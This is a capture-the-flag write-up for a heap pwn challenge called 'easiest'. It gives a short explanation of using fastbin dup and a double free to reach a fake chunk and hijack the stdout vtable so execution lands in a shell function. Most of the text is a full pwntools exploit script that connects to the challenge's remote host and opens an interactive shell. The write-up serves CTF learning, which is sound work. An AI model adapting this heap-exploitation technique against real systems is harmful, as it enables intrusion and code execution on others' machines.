Tags: easiest 

Rating: 5.0

No captcha required for preview. Please, do not write just a link to original writeup here

We use `fastbin dup` and `double free` to malloc a arbitrary memory in `GOT`. However, `fastbindup` requires to check new chunk's size before allocating. I found that address `0x60207a`. Because that address was higher than `GOT` address, in order to we can not overwrite `GOT`. So, We can overwrite `stdout` to fake a new `vtable` to jump into `shell()`.

```
#!/usr/bin/env python

from pwn import *

__DEBUG__ = False
__BIN__ = "./easiest"
ELF(__BIN__)
__LIBC__ = ""

__HOST__ = "39.96.9.148"
__PORT__ = 9999

__DEBUG__ = int(raw_input("> "))
if __DEBUG__:
io = process(__BIN__)
else:
io = remote(__HOST__, __PORT__)

def add(idx, leng, data):
io.recvuntil("lete ")
io.sendline("1")

io.recvuntil("(0-11):")
io.sendline( str(idx) )

io.recvuntil("Length:")
io.sendline( str(leng) )

io.recvuntil("C:")
io.sendline( data )

def delete(idx):
io.recvuntil("lete ")
io.sendline("2")

io.recvuntil("(0-11):")
io.sendline( str(idx) )

shell = 0x400946
fake_chunk = 0x60207a
ptr = 0x6020c0

add(11, 0x40, p64(shell)*8)
add(10, 0x38, p64(0xdeadbeef))
add(9, 0x30, p64(0xdeadbeef))
delete(10)
delete(9)
delete(10)
add(1, 0x30, p64(fake_chunk))
add(1, 0x30, p64(0)) #check
p = "\x00"*6
p += "\x00"*0x10 #padding
p += p64(ptr-216+88)
# p += p64(shell)

add(9, 0x30, p64(fake_chunk))

if __DEBUG__:
gdb.attach(io)

add(10, 0x38, p)
io.sendline("h4niz")

io.sendline("whoami")

io.interactive()
```